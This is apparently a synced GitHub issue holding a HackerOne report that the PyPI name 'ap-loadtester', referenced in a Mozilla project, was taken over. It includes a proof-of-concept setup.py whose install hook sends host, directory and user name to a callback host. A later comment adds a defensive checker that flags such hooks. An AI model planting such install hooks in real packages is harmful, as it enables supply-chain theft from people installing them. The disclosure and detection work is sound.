
code injection through pip

Open data-sync-user opened this issue 10 months ago • 1 comments

HackerOne Report: https://hackerone.com/reports/2097694
Report Date: 2023-08-05 17:06:15 UTC
Reporter: anupamas01
Weakness: Code Injection

Initial Report:

Summary:

hello team, I found a pip package by which I can run malicious commands.

Steps To Reproduce:

[add details for how we can reproduce the issue]

  1. Go to https://github.com/mozilla-services/autopush-loadtester (as it is heavily used, I have not uploaded a higher version, which may affect production).
  2. You can see "$ pip install ap-loadtester"; you can see I have taken it over at https://pypi.org/project/ap-loadtester/ (in Maintainers). When you install it, it will install my pip package.

POC

https://pypi.org/project/ap-loadtester/

(Right now I am not uploading any code; if the program allows, I will upload.)

# setup.py from the PoC: a custom install command that runs after pip installs the
# package and sends the host name, working directory and user name to a callback URL.
from setuptools import setup
from setuptools.command.install import install
import requests
import socket
import getpass
import os

class CustomInstall(install):
    def run(self):
        install.run(self)  # perform the normal install first
        hostname = socket.gethostname()
        cwd = os.getcwd()
        username = getpass.getuser()
        ploads = {'hostname': hostname, 'cwd': cwd, 'username': username}
        # replace burpcollaborator.net with Interactsh or pipedream
        requests.get("https://burpcollaborator.net", params=ploads)

setup(name='ap-loadtester',  # package name
      version='1.0.0',
      description='test',
      author='test',
      license='MIT',
      zip_safe=False,
      cmdclass={'install': CustomInstall})



Impact

code injection through the pip package

Thanks, AnupamAs01





┆Issue is synchronized with this [Jira Bug](https://mozilla-hub.atlassian.net/browse/SYNC-3860)
┆Attachments: [F2576644] image.png (https://mozilla-hub.atlassian.net/rest/api/2/attachment/content/40617)

data-sync-user Aug 07 '23 11:08
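Added example, not part of the report or of the autopush project: a static check over a setup.py that flags classes overriding setuptools commands (the cmdclass install hook the PoC relies on) and lists the network or process-spawning modules they reference, so a reviewer can catch such a package before pip runs it. The two setup.py strings and the callback host are constructed for this example.

```python
import ast
# Constructed sample modelled on the PoC: an install hook that phones home.
HOOKED_SETUP_PY = '''
from setuptools import setup
from setuptools.command.install import install
import requests, socket, os

class CustomInstall(install):
    def run(self):
        install.run(self)
        requests.get("https://callback.example", params={"h": socket.gethostname()})

setup(name="ap-loadtester", version="1.0.0", cmdclass={"install": CustomInstall})
'''

# Constructed benign sample: plain metadata, no command overrides.
PLAIN_SETUP_PY = 'from setuptools import setup\nsetup(name="ap-loadtester", version="1.0.0")\n'

# Command classes whose overrides run during install/build, and modules that
# an install step has no business touching.
HOOKABLE_COMMANDS = {"install", "develop", "egg_info", "build_py", "sdist"}
NETWORK_MODULES = {"requests", "urllib", "http", "socket", "ftplib", "smtplib"}
SPAWN_CALLS = {"system", "popen", "run", "Popen", "call", "check_output"}

def _base_name(base):
    return base.attr if isinstance(base, ast.Attribute) else getattr(base, "id", "")

def install_hook_findings(source):
    """Return (class name, overridden commands, suspicious references) for each
    class in `source` that subclasses a setuptools command; empty list if none."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.ClassDef):
            continue
        bases = sorted({_base_name(b) for b in node.bases} & HOOKABLE_COMMANDS)
        if not bases:
            continue
        hits = set()
        for sub in ast.walk(node):
            if isinstance(sub, ast.Attribute) and isinstance(sub.value, ast.Name):
                mod = sub.value.id
                if mod in NETWORK_MODULES:
                    hits.add(mod)
                elif mod in {"os", "subprocess"} and sub.attr in SPAWN_CALLS:
                    hits.add(f"{mod}.{sub.attr}")
        findings.append((node.name, bases, sorted(hits)))
    return findings
```

Run install_hook_findings over the setup.py of an sdist before installing it; any class returned deserves a manual read, and network references inside it are a strong signal of install-time exfiltration.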